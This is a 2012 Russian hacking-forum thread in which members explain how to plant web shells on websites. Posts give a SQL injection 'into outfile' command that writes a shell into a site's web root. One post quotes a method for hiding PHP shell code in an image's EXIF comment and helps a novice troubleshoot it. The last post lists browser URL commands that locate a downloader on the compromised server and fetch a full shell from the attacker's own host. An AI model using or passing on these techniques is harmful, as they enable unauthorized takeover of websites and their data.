 |
|
25.02.2012, 19:01
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Mr.Wekly
Расскажите по подробней способ заливки шелла через MySQL injection. Спасибо.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select[/COLOR][COLOR="#DD0000"]'код мини шела'[/COLOR][COLOR="#0000BB"]into outfile[/COLOR][COLOR="#DD0000"]'/путь относительно корня сайта/shel.php'[/COLOR][/COLOR]
данный метод требует файловые привилегии и не слешируемые кавычки, это если через адрессную строку ну и через пхп админ теже привилегии но кавычки там как правило не слешируются...
также директория куда будет литься шелл должна быть разрешена для запеси.
|
|
|
25.02.2012, 22:42
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от winstrool
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select[/COLOR][COLOR="#DD0000"]'код мини шела'[/COLOR][COLOR="#0000BB"]into outfile[/COLOR][COLOR="#DD0000"]'/путь относительно корня сайта/shel.php'[/COLOR][/COLOR]
данный метод требует файловые привилегии и не слешируемые кавычки, это если через адрессную строку ну и через пхп админ теже привилегии но кавычки там как правило не слешируются...
также директория куда будет литься шелл должна быть разрешена для запеси. также для проверки привилегий "по быстрому" рекомендую просто залить в папку /tmp/ если льётся - то права есть)
|
|
|
|
26.02.2012, 14:44
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами:
8039126
Репутация:
-6
|
|
стандартные подливки.
|
|
|
|
26.02.2012, 19:40
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
какой кул хакер нашёлся
|
|
|
|
08.03.2012, 16:14
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Большое спасибо за статью. Все те разрозненные наборы информации, что по крупицам приходилось гуглить, собрано здесь, в одном месте. Статья помогла найти ответы на некоторые вопросы, которые вроде и лежат на поверхности, но вот осознать их получилось только с конкретными примерами синктаксиса в коде, которые можно с удовольствием наблюдать тут.
Пиши есчо)
|
|
|
|
09.03.2012, 15:52
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Спасибо
|
|
|
|
11.03.2012, 02:15
|
|
Новичок
Регистрация: 06.03.2011
Сообщений: 4
С нами:
7993046
Репутация:
0
|
|
подскажите всё делаю как тут написано
8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...
Подробнее тут
делаю фото 123.jpg
закачиваю на сайт
скрипт сайта меняет ему название но коменты оттаются
меняет на 3973819_77116-32x32x.jpg
прохажу по пути site.ru/data/cache/2012mar/11/04/3973819_77116-32x32x.jpg?cmd=phpinfo()
так как картинка была так и остаётся
и так пробывал site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo()
вообще ошибка вылезает
что я не так делаю ?
|
|
|
|
11.03.2012, 02:34
|
|
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
С нами:
8742676
Репутация:
94
|
|
Сообщение от Alex2103
подскажите всё делаю как тут написано
8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...
Подробнее тут
делаю фото 123.jpg
закачиваю на сайт
скрипт сайта меняет ему название но коменты оттаются
меняет на 3973819_77116-32x32x.jpg
прохажу по пути site.ru/data/cache/2012mar/11/04/3973819_77116-32x32x.jpg?cmd=phpinfo()
так как картинка была так и остаётся
и так пробывал site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo()
вообще ошибка вылезает
что я не так делаю ?
какая ошибка?
возможно вы забыли ; после phpinfo()
|
|
|
|
11.03.2012, 03:05
|
|
Новичок
Регистрация: 06.03.2011
Сообщений: 4
С нами:
7993046
Репутация:
0
|
|
ошибка
Access forbidden!
You don't have permission to access the requested directory. There is either no index document or the directory is read-protected.
If you think this is a server error, please contact the webmaster.
Error 403
site.ru
Sun Mar 11 02:02:31 2012
Apache/2.2.21 (FreeBSD) PHP/5.3.5 with Suhosin-Patch
Я ещё новичок в этом
а что я там забыл ???
ребят ответе, навидите на путь истенный ))))
|
|
|
|
11.03.2012, 04:26
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
said:
какая ошибка?
возможно вы забыли ; после phpinfo()
Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.
И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Например мы залили , тогда
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;[/COLOR][/COLOR]
// Узнаем "качалку", если fetch, то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php[/COLOR][/COLOR]
// Заливаем полноценный шелл
Если мы залили , то
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");[/COLOR][/COLOR]
Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".
Как-то так, в общем.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
